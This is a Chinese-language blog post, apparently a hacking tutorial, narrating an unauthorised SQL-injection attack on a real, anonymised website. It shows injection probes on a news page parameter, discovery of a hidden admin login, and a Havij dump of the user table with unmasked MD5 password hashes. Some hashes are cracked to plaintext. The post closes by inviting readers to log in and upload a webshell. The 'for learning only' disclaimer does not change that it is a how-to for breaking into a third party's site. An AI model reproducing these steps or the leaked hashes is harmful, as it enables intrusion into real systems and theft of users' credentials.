不知不觉又长了一年,曾经的我,面对红与黑向来不予置评,可骨感的现实却让人无意瞥见那一抹悲哀,让一直倔强的人啊变成了如今这幅摸样
好了闲话不多说,就将曾经第一次学渗透的时候的一个简单笔记列出来供大家分享,希望有些用处。。。
以下分享纯粹是为了学习之用,希望对有帮助的盆友不会用某些技术来做坏事。。。
----------------------------------------------------------------------------------------------------------------------------------------------
由于某些原因,网站不方便了列出,用www.××××.com代表
------------------------------------------------------------------------------------------------------------------------------------------------
大家好,我是水东流 QQ: 2875984313 (美女加,男吊丝勿扰)
第1次做教程,做的不好请见谅,
我们的QQ群:黑蚂蚁技术联盟渗透部 126931620(有兴趣加,朋友群)
好了,我们开始,,
今天的目标站:http://www.******.com
1、探测网站http://www.××××.com信息
2、打开http://www.××××.com网址
3、点击进入一个页面如:http://www.××××.com/en/news_v.asp?id=51
4、简单测试看看是否存在sql注入漏洞
http://www.××××.com/en/news_v.asp?id=51`
发现还确实存在漏洞
5、猜测相关字段比如利用order by *
http://www.××××.com/en/news_v.asp?id=51%20order%20by%206
。。。
http:/www.××××.com/en/news_v.asp?id=51%20order%20by%207等等
结果发现:http://www.××××.com/en/news_v.asp?id=51%20order%20by%206显示正常
。。。
http://www.××××.com/en/news_v.asp?id=51%20order%20by%207显示错误
由此可知access表一共有6个字段,下面就可以来猜测账号、密码字段
6、利用and 0<>(select count(*) from admin)猜测是否存在admin这张表
结果不行了,似乎有点问题。。。
继续寻找方法
根据以往的经验,后台一般是网站后面跟着/admin、/manage等常见的后台目录,这里测试一下
7、构造地址:http://www.××××.com/admin 并且打开
结果显示错误404
将admin换成robots.txt试一试,结果还是不行
考虑到现在很多管理人员都将都有安全意识,然后有些人又喜欢自作聪明的仅仅
只是在admin前面加上web前缀,所以试一试webadmin看看行不行
哎呀,行了!
8、登陆网站后台http://www.××××.com/webadmin/login.asp,猜测账号以及密码
很显然后台登陆界面写的很差,连个基本的验证码都没有,但也不能就说它的程序写得差。
好了进入正题:
由于没有猜到正确的账号和密码,那么先可以查看它对应的源码来试试运气,希望可以成功。
发现右键功能被屏蔽。用菜单的查看-查看源码功能。
发现input name=userid id-----userID validator---uid
id--------userPassword validator------password
利用6中的and 0<>(select count(*) from userID) 进行测试
没发现
转而利用:and 1=2 and exists(select * from admin)试试运气
将admin换成manager、tabmanager、userID、user等等都没有发现
虽然没有找到,但是在改成user的时候网页显示的信息结果与其他的都不一样的,可能是做了
相关的处理,具体不知。。。。0.0。。。。
所以接下来就是用相关的注入工具进行相关的测试工作。。
9、使用sql注入工具havij试试
操作不多少,相当简单,直接输入注入网址就行了。
结果发现相关DBs信息情况:
------------------------------------------------------------
DBS:MsAccess
------------------------------------------------------------
Tables:user
-------------------------
Columns:email
password
username
id
-------------------------
Datas:
××××@htomail.com 827ccb0eea8a706c4c34a16891f84e7b ××××× 1
......
--------------------------------------------------------------
相关扫描的数据结果如下;
Data Found: email=××××××@hotmail.com
Data Found: password=827ccb0eea8a706c4c34a16891f84e7b
Data Found: username=××××
Data Found: id=1
Data Found: email=××××××××@yahoo.com
Data Found: password=d3af9e9ab49a6d3f8e7e9ec03902402a
Data Found: username=×××××××
Data Found: id=10
Data Found: email=xx×××@sina.com
Data Found: password=5ce6308eae951da74d27580bd23e7ca4
Data Found: username=xx×××××××
Data Found: id=11
Data Found: email=××××××××@sina.com
Data Found: password=827ccb0eea8a706c4c34a16891f84e7b
Data Found: username=××××××××
Data Found: id=12
Data Found: email=×××××××@163.com
Data Found: password=354fadaddfc4c03f3ee294d299381113
Data Found: username=××××××××
------------------------------------------------------------------
虽然上一步中改成user的探测没有成功但是可以肯定的是数据库中确实是有user表的。
10、接下来就是对于md5值进行相关解密,查询网址:http://www.cmd5.com/
id=1
username=××××
password=827ccb0eea8a706c4c34a16891f84e7b -----解密后-----12345
id=11
username=×××××
password=5ce6308eae951da74d27580bd23e7ca4 -----解密后-----xxb380
后面的就不进行解密了,知道怎么解密就行......
上面数据只是部分而已,邮箱以及账号部分都做了处理。。。。
11、重新尝试步骤8,登陆操作,验证账号密码是否可行
12、如果登录成功,上传什么马就看大家自己的意愿了。。。。
如果不成功,可能是由某些原因但是一般的得到账号密码的简单步骤也就。。。。。